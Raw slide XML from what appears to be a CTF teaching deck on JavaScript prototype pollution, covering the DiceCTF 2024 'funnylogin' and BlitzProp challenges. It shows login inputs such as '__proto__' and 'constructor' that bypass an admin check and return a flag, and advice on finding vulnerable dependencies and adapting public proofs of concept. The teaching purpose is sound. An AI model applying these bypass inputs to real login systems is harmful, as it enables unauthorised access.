                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"flag{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>I_am_totally_not_hiding_my_tears_while_playing_DiceCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}"</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 }</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funnylogin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"how to solve"</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D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>undefined</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>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funnylogin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"__proto__"</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flag{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>I_am_totally_not_hiding_my_tears_while_playing_DiceCTF</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funnylogin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"constructor"</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flag{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>I_am_totally_not_hiding_my_tears_while_playing_DiceCTF</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&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>funnylogin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>flag{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>I_am_totally_not_hiding_my_tears_while_playing_DiceCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15844A00-A672-DF8F-4088-A1824F6D0D79}"/>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https://ctftime.org/writeup/38612</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26295768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3BAF87-7E16-CF53-21A3-DA16A025D590}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="2000" dirty="0"/>
              <a:t>Polluting prototypes: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="2000" dirty="0" err="1"/>
              <a:t>DiceCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="2000" dirty="0"/>
              <a:t> 2024 Quals/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="2000" dirty="0" err="1"/>
              <a:t>funnylogin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="2000" dirty="0"/>
              <a:t> 2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C3FA0E5-3666-CE42-149F-9F39B4D8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9" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42B5A190-582C-A81B-7F3B-6C2C94EADD1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="729450" y="1321200"/>
            <a:ext cx="7688700" cy="3428651"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>To understand it, we only need to know JavaScript coerce objects into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B58900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> [1]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Then, while </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>isAdmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> looks empty, we can simply access the properties on the prototype of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>isAdmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> instead of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>isAdmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> itself to get an object, then the condition becomes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B58900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>This is not prototype pollution at all, only mentioned here for interest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>More likely, when you do prototype pollution, you need another vulnerability or gadget so that you can get the flag, which will be the next section</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15844A00-A672-DF8F-4088-A1824F6D0D79}"/>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https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Boolean#boolean_coercion</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4101538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dirty="0"/>
              <a:t>Finding gadgets</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US"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As mentioned before, prototype pollution itself alone cannot do much, and requires other gadgets or vulnerabilities to get the flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>For web challenges, combination of many techniques are required</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>In general, to find gadgets, you need to…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Know about many web techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Have much CTF experience</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Know about code that seems safe at first but is vulnerable actually</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>To conclude, experience (probably applies to other CTF categories as well)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Since there are many web techniques and many ways some code can be vulnerable, we will not enumerate them here</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Instead, we will look at an interesting example (no time for more examples </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>) to give you a feel on how gadgets look like and how different techniques can combine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Other techniques will not be explained thoroughly here due to it being out of scope; please see the references instead</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>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14581913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dirty="0"/>
              <a:t>Finding gadgets: finding vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US"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Cyber Apocalypse 2021/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0" err="1"/>
              <a:t>BlitzProp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> [1]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Contextual hints are important, even if it is a single word</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="859900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if</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song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name</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includes</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'Not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Polluting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> with the boys'</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song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name</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includes</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ASTa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> la vista baby'</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song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name</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includes</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'The Galactic Rhymes'</a:t>
            </a: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song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name</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includes</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'The Goose went wild'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)) {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>When there is no obvious exploitable code in the source file, examine the dependencies by searching online [2]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"dependencies"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: {</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"express"</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"^4.17.1"</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"flat"</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"5.0.0"</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"pug"</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"^3.0.0"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="657B83"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>You might even find proofs of concept (PoC) that can be easily adapted to your situation! [3]</a:t>
            </a:r>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a:xfrm>
            <a:off x="8536302" y="4717717"/>
            <a:ext cx="548700" cy="393600"/>
          </a:xfrm>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5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12DBD039-B24A-1C7A-D0A5-B35D18A81E9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-11777" y="4683685"/>
            <a:ext cx="6434807" cy="461665"/>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https://ctftime.org/writeup/28035</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/advisories/GHSA-2j2x-2gpw-g8fm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="800" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/hughsk/flat/issues/105</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31" name="Group 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B0984E2-24EA-6948-C616-BA51A6D80594}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2406562" y="2467995"/>
            <a:ext cx="6983256" cy="1945901"/>
            <a:chOff x="2406562" y="2467995"/>
            <a:chExt cx="6983256" cy="1945901"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Picture 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BA2B1D3-7FAC-2009-8AF4-A6F6DE84EB35}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2829665" y="2493023"/>
              <a:ext cx="2825928" cy="1856046"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44C78503-6D02-AC5A-1948-D1B7F144CC9C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6202199" y="2467995"/>
              <a:ext cx="3129539" cy="730399"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Picture 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EADCA0E4-7800-A285-9B3F-85E289CDF9DC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6234103" y="3339799"/>
              <a:ext cx="3155715" cy="1074097"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="13" name="Connector: Curved 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D32FE88-D804-56D1-84F1-32F0C7514103}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="7" idx="3"/>
              <a:endCxn id="9" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
